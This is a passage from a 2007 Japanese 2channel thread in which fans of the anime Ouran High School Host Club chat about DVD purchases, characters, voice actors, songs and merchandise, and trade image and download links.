特に男の子とかに見せると将来女の子に優しくできるような、
かっちょイイ子になるんじゃないかとも思えるんだよね、このアニメ。

112 :名無しさん@お腹いっぱい。:2007/01/22(月) 04:20:12 ID:TthDDoMA
>>111
激しく同意

>>109
あと俺です、すみませんでした…。
鉄也を達也って間違えたのも俺です、すみませんでした…。

113 :名無しさん@お腹いっぱい。:2007/01/22(月) 11:08:09 ID:Zgsz4GFG
女の子に見せたられんげみたいになりそうだけどな

虫歯の話でモリがハニーを押し倒してる時のれんげはいつ観ても吹く

114 :名無しさん@お腹いっぱい。:2007/01/22(月) 12:52:22 ID:BSyPob8k
小学生の男の子は興味ないな
あの歳の頃は冒険物・バトル物にしか見ない

115 :名無しさん@お腹いっぱい。:2007/01/22(月) 13:36:24 ID:y/4610jV
鏡夜先輩5話で脈絡のことミャクリャクって言ってる気がして萌える

116 :名無しさん@お腹いっぱい。:2007/01/22(月) 13:41:36 ID:wzW/vSjO
須王環:宮野真守 →日テレでデスノート見てるぞー
常陸院光:鈴村健一 →MX東京で半分の月見てるぞー

117 :名無しさん@お腹いっぱい。:2007/01/22(月) 14:18:00 ID:nOof0YMo
>>115
マジでミャクリャクって言ってる
2話でもふいんきって言ってる
つまり鏡夜はねらー

118 :名無しさん@お腹いっぱい。:2007/01/22(月) 15:15:13 ID:BjXsNWPI
>>111
実際のホストもあんな感じだと思われると問題だけどね

119 :名無しさん@お腹いっぱい。:2007/01/22(月) 15:43:04 ID:0DOOO1bs
もうすぐDVDが全巻揃ってしまうなあ
嬉しいような寂しいような
全部が高レベルでここ数年で一番面白いと思ったアニメだった

120 :名無しさん@お腹いっぱい。:2007/01/22(月) 17:22:10 ID:mEvU9VZl
DVD収納ボックス貰うために全巻アニメイトで買ってます。

121 :名無しさん@お腹いっぱい。:2007/01/22(月) 17:31:11 ID:78THjtKG
>>110
だろうね。
建前は家政婦として雇ったことになってるけど
実際は丁重に保護されてるんだろうな

122 :名無しさん@お腹いっぱい。:2007/01/22(月) 20:24:25 ID:K88Q5Vub
>>114
小1の弟に見せたが面白いって言ってたぞ

123 :名無しさん@お腹いっぱい。:2007/01/22(月) 20:52:20 ID:jdXUMtOx
れんげたああああああああん
(*´Д`)'`ァ'`ァ'`ァ'`ァハァハァ/lァ/lァ/ヽァ/ヽァ ノ \ア ノ \ア / \ ア / \ ア

124 :名無しさん@お腹いっぱい。:2007/01/22(月) 21:16:43 ID:TthDDoMA
>>123
貴方の鈍い態度に、私少々呆れましたわ。

125 :名無しさん@お腹いっぱい。:2007/01/22(月) 21:34:39 ID:sekoseIX
以前アニメが放映中のときに
コタツイベントでの「ブラーボ、モナーミ」で飛び跳ねる殿の動画gif
をどこかで見たことがあるんだが

見たことある人いない?
あれ個人観賞用に欲しいんだが、無理なんだろうか
ソレに関して細かいことがわからんので、スレ違いだったら申し訳ない

126 :名無しさん@お腹いっぱい。:2007/01/22(月) 21:39:03 ID:TthDDoMA
モナーミってどういう意味かな?

127 :名無しさん@お腹いっぱい。:2007/01/22(月) 21:50:19 ID:/yfsc4tw
my friend

128 :名無しさん@お腹いっぱい。:2007/01/22(月) 23:15:18 ID:leDYemd4
youtubeで落とした全話を間違って消しちゃった  orz
TUTAYAでDVD借りてくるか・・・

129 :名無しさん@お腹いっぱい。:2007/01/23(火) 00:20:40 ID:mGAq6FUL
誰か>>128にTSUTAYAまでの地図を差し上げろ

130 :名無しさん@お腹いっぱい。:2007/01/23(火) 00:28:37 ID:KmntMvJ9
日テレ携帯サイトの待ち受け画像で
おまけの#3は本編には無い画像ですよね?


131 :名無しさん@お腹いっぱい。:2007/01/23(火) 00:39:30 ID:oacXyEHD
>>129
はいはい。
>>127
サンキューな!

132 :名無しさん@お腹いっぱい。:2007/01/23(火) 07:08:25 ID:YYUPuflZ
ようつべで見た派だけど、凄く気に入ってDVDを買いましたよ

133 :名無しさん@お腹いっぱい。:2007/01/23(火) 08:18:57 ID:J2KZ5kdK
ホスト部のネットラジオがポッドキャスティングで配信されていたらしいのですが、すでに終了しているようでした…
もう聞けないのでしょうか?


134 :名無しさん@お腹いっぱい。:2007/01/23(火) 08:46:29 ID:iQaZ/c0X
サントラ&キャラソン集(前・後編)の初回限定版が手に入れられれば聞けるよ

135 :名無しさん@お腹いっぱい。:2007/01/23(火) 12:31:13 ID:dpX+45Z2
金ないからDVDは買えないけど
ドラマCDとか出てるなら持ってないし買おうかな

136 :名無しさん@お腹いっぱい。:2007/01/23(火) 12:38:52 ID:3edn2f9n
>>130
会員登録していないから小さい画面でしか確認できなかったけど
たぶん本編にはなかったと思うよ
でもこれ何の画像なのか気になる

137 :名無しさん@お腹いっぱい。:2007/01/23(火) 13:10:50 ID:fslKoxdg
全話見終わったけど、ハルヒかわいいって言うのよくわかった
見た目じゃなくて正確がやばいほどかわいいな

138 :名無しさん@お腹いっぱい。:2007/01/23(火) 13:18:42 ID:gEbSN6oB
別に

139 :名無しさん@お腹いっぱい。:2007/01/23(火) 13:29:55 ID:gOR3GcoX
ツンデレハルヒktkr

140 :名無しさん@お腹いっぱい。:2007/01/23(火) 14:49:43 ID:jA6yK0aw
>>125
殿うざかわいいwww
ttp://kissho.xii.jp/1/src/1jyou0399.gif

141 :名無しさん@お腹いっぱい。:2007/01/23(火) 14:51:50 ID:jA6yK0aw
お、もういっこあった
ttp://kissho.xii.jp/1/src/1jyou0400.gif

142 :名無しさん@お腹いっぱい。:2007/01/23(火) 14:58:04 ID:wpMKVQtD
ホスト部ゲーム。初めは買う気ゼロだったけど
この限定版はちょっと惹かれるなw
「設定原画集、ボイス集、声優インタビュー」か。
でもPS2から買わなきゃだしな〜

143 :名無しさん@お腹いっぱい。:2007/01/23(火) 15:04:54 ID:DSulYNvC
>>134
近所のツタヤには初回版が置いてあったよ

144 :名無しさん@お腹いっぱい。:2007/01/23(火) 15:40:19 ID:Y25YUqvp
桜キッスと疾走とギルティビューティーラブ(綴り忘れた)を仕事仲間で行ったカラオケで朝歌ってきましたよ

145 :名無しさん@お腹いっぱい。:2007/01/23(火) 17:33:01 ID:opG2xFpg
>>144
ええええええええええええええええええええ

カラオケ配信されたのか!!!!!!!
歌いてえええええええええええええええええ

146 :名無しさん@お腹いっぱい。:2007/01/23(火) 17:44:02 ID:gEbSN6oB
>>140ー141
おぉ、かわいー

147 :名無しさん@お腹いっぱい。:2007/01/23(火) 17:50:15 ID:3edn2f9n
>>145
いっしょに熱唱しようぜ

148 :名無しさん@お腹いっぱい。:2007/01/23(火) 18:52:18 ID:gOR3GcoX
モリ先輩が我が家にキタ━━━━━━(゚∀゚)━━━━━━!!!!!
これから見るよwktk

149 :125:2007/01/23(火) 20:03:43 ID:SaH8AotX
>>140-141
探してたのコレ(1個目)です!!
ありがとうございます

150 :名無しさん@お腹いっぱい。:2007/01/23(火) 21:21:20 ID:1Moycfjn
閉鎖しなかったあああああああああああああああああああ
お前らとまたハルヒの可愛さについて語り合えるうううううううううううううう!!

151 :名無しさん@お腹いっぱい。:2007/01/23(火) 21:47:51 ID:gEbSN6oB
>>150
なんの為に専用の萌えスレあんの?
ハルヒスキーばかりとは限らないのに空気嫁BAー?

152 :名無しさん@お腹いっぱい。:2007/01/23(火) 21:55:11 ID:VCCRsLFy
鏡夜はあの商品、どうしたんだろ

153 :名無しさん@お腹いっぱい。:2007/01/23(火) 22:03:24 ID:YYUPuflZ
>>148
我が家にもキテター
飯食って風呂入って布団に入ってから、マッタリと見るw

154 :名無しさん@お腹いっぱい。:2007/01/23(火) 22:14:24 ID:75NIu7hi
しもた・・・セブンイレブンで受け取るの忘れたアッヒャッヒャ!ヽ(゚∀゚)ノアッヒャッヒャ!

155 :名無しさん@お腹いっぱい。:2007/01/23(火) 22:17:04 ID:a85zT6I6
宮野のエプソードがのってるのって何話?

156 :名無しさん@お腹いっぱい。:2007/01/23(火) 22:37:24 ID:/FB1l4Q9
ラスあらのCDレンタルに無い・・・
ジャニスにも無かった・・・

157 :名無しさん@お腹いっぱい。:2007/01/23(火) 23:00:49 ID:oacXyEHD
仲良くしようぜ。

158 :名無しさん@お腹いっぱい。:2007/01/23(火) 23:12:34 ID:6JTRus34
ファミ通より電撃ですな
桜ホスファンには

159 :名無しさん@お腹いっぱい。:2007/01/24(水) 00:28:01 ID:z3E7gK5/
ファミ通に殿の親友って新キャラ見掛けなかったんだよなー。電プレ見てみよう

160 :名無しさん@お腹いっぱい。:2007/01/24(水) 00:59:25 ID:+9/cKOd2
>>155


161 :名無しさん@お腹いっぱい。:2007/01/24(水) 01:35:40 ID:j69VdNk8
デスノのDVD初回版は、ホスト部より安いのにフィギュアはしっかりした作りなんだね。

162 :名無しさん@お腹いっぱい。:2007/01/24(水) 01:42:32 ID:dmwQqYWO
日テレやVAPの力の入れ方がまるで違う
ホスト部はDVDのCMさえ作ってもらえなかった

163 :名無しさん@お腹いっぱい。:2007/01/24(水) 02:04:49 ID:XgRBxtaV
>>162
な、なんだつてぇー!?
ていうかスポンサー無しで出来たんだろうかね?

164 :名無しさん@お腹いっぱい。:2007/01/24(水) 02:19:14 ID:o4JNEtd+
>>161
でも月のフィギュアは変だった

165 :名無しさん@お腹いっぱい。:2007/01/24(水) 02:31:54 ID:PC+TfYTS
DVD買う気無かったんだけど、ここ見てたら欲しくなったよ。
あーもう。モリ先輩大好き。

166 :名無しさん@お腹いっぱい。:2007/01/24(水) 06:26:01 ID:UW6y3J0q
デスノはめちゃめちゃ期待してた
でも、もう見ていない
ホスト部はじまった時は実況板で罵倒していた
でも、今ではDVDを買っている…

167 :名無しさん@お腹いっぱい。:2007/01/24(水) 07:17:39 ID:/j13jVHC
そんな>>156のために前スレでも貼ったが↓から疾走落とせるぞ


http://124.38.226.90/servlet/BBSmsg?bbsid=151255&threno=50685725&msgno=50686314&msgkb=1 (PC用)

http://124.38.226.90/servlet/BBSmsg?bbsid=47897&threno=48751649&msgno=48751649&msgkb=0 (携帯3G用)



ホスト部もラスアラも好きで、アルバムも持ってる俺は勝ち組?

168 :名無しさん@お腹いっぱい。:2007/01/24(水) 07:47:00 ID:XgRBxtaV
>>167
お前、いい奴だよな

169 :名無しさん@お腹いっぱい。:2007/01/24(水) 09:37:38 ID:NRabRjpM
>>167俺の携帯できneeeeeeeeorz

しかたないから例の動画サイトで聴いとくよ…

170 :名無しさん@お腹いっぱい。:2007/01/24(水) 11:00:54 ID:3OHss/mO
DVDキタワ〜゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・*
パッケージ裏のモリ先輩の顔wどんな時ああなるのか激しく問いたい

171 :名無しさん@お腹いっぱい。:2007/01/24(水) 11:33:13 ID:2RVfdnph
ハルヒの家にはDVDプレイヤーないな。きっと

172 :名無しさん@お腹いっぱい。:2007/01/24(水) 13:00:38 ID:xOCswbfc
>>170
あれって第1話でモリ先輩がハルヒを抱き上げる前の顔と同じだよなw

173 :名無しさん@お腹いっぱい。:2007/01/24(水) 13:53:49 ID:VPSv2YL8
>>155
ファンブックにはオンエアしたって書いてあるけど、正直どこだか分からない

174 :名無しさん@お腹いっぱい。:2007/01/24(水) 15:01:53 ID:/x3BoVV7
>>170>>172
モリ先輩の裏顔激しく気になるw
お金がないからまだハルヒ殿モリの裏表紙見たことない
れんげも気になるが9巻表紙の女ver.ハルヒの裏表紙はどうなるのだろう


175 :名無しさん@お腹いっぱい。:2007/01/24(水) 16:13:46 ID:9thTdESv
来月発売DVDのメニュー画面で流れる曲って何なんだろ?疾走とまた明日!どっちだろー。

176 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:40:48 ID:pfyljsx/
ttp://www.oricon.co.jp/rank/da/d/
4位オメ

177 :名無しさん@お腹いっぱい。:2007/01/24(水) 22:34:13 ID:GnaxkQ55
>>176
同じ少女漫画の中でトップというのが嬉しい

178 :名無しさん@お腹いっぱい。:2007/01/24(水) 22:54:49 ID:CsCHJ+N2
36歳毒男
今までに全巻揃えた少女漫画

あおいちゃんパニック&←に続く竹本泉シリーズ
純情クレイジーフルーツ
ここはグリーンウッド

そして・・・・・・
桜蘭高校ホスト部

結婚出来ない訳だwwwwwwwwwwwwwwwwwwwwww・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・_| ̄|○


179 :名無しさん@お腹いっぱい。:2007/01/24(水) 23:20:05 ID:pzCO+uLt
>>178
結婚できない理由を少女漫画のせいにするなんて・・・



見苦しいぞ!

180 :167乙です:2007/01/24(水) 23:34:40 ID:JxhORz4F
うわ me&your買っちまった 
ラスあら自体にハマッタ
1日のCDJ行った人いる?

181 :名無しさん@お腹いっぱい。:2007/01/24(水) 23:35:29 ID:/x3BoVV7
>>179
モリ先輩乙w

182 :名無しさん@お腹いっぱい。:2007/01/24(水) 23:52:25 ID:XgRBxtaV
>>167のハニー先輩のお休みメッセージがやたらエロいと思うのは俺だけか!?

183 :名無しさん@お腹いっぱい。:2007/01/25(木) 00:25:16 ID:rXLk/+Ih
>>182
可愛いと思ったw
でも気のせいかもだけど…FFのリュックに声が似てる気がした…

46 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)